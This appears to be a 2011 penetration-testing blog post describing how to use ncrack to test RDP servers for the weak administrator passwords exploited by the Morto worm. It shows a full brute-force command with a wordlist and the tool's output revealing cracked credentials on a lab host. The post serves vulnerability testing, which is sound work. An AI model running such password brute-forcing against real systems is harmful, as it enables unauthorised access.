carnal0wnage [Shared Reader]

Monday, August 29, 2011

Using ncrack to test for servers vuln to Morto worm

Looks like the Morto worm is floating around. I frequently run into just seeing 3389 open on pentests and if the local admin account is "administrator" you can beat up on it pretty good with ncrack.

hdm did a post on why/how you can find those pesky local admin accounts with weak password by using the smb_login module. post is here.

If you live where someone is gonna give you a hassle because SMB is not allowed out, you can always use ncrack to prove your point. I did a short post on it awhile back.

Anway, grab it from nmap svn, and compile, dont think the RDP plugin for it was enabled in the downloadable binaries (i didnt check...i use the svn).

The F-Secure blog has the list of passwords its using here.

Looks like this:



$ ncrack -vv -d7 --user administrator -P /home/user/morto.txt 192.168.26.137:3389,CL=2

rdp://192.168.26.137:3389 (EID 1) Login failed: 'administrator' 'admin'
rdp://192.168.26.137:3389 (EID 1) Attempts: total 1 completed 1 supported 1 --- rate 0.94
rdp://192.168.26.137:3389 (EID 2) Login failed: 'administrator' 'password'
rdp://192.168.26.137:3389 last: 0.00 current 0.50 parallelism 2
...
Discovered credentials on rdp://192.168.26.137:3389 'administrator' 'admin123'
rdp://192.168.26.137:3389 last: 0.02 current 0.01 parallelism 2
rdp://192.168.26.137:3389 Increasing connection limit to: 2
rdp://192.168.26.137:3389 (EID 30) Attempts: total 30 completed 30 supported 1 --- rate 1.62
rdp://192.168.26.137:3389 (EID 31) Login failed: 'administrator' '1234567890'
rdp://192.168.26.137:3389 finished.
rdp://192.168.26.137:3389 (EID 31) Attempts: total 31 completed 31 supported 1 --- rate 1.81
nsock_loop returned 3

Discovered credentials for rdp on 192.168.26.137 3389/tcp:
192.168.26.137 3389/tcp rdp: 'administrator' 'admin123'

Ncrack done: 1 service scanned in 18.00 seconds.
Probes sent: 31 timed-out: 0 prematurely-closed: 0

Ncrack finished.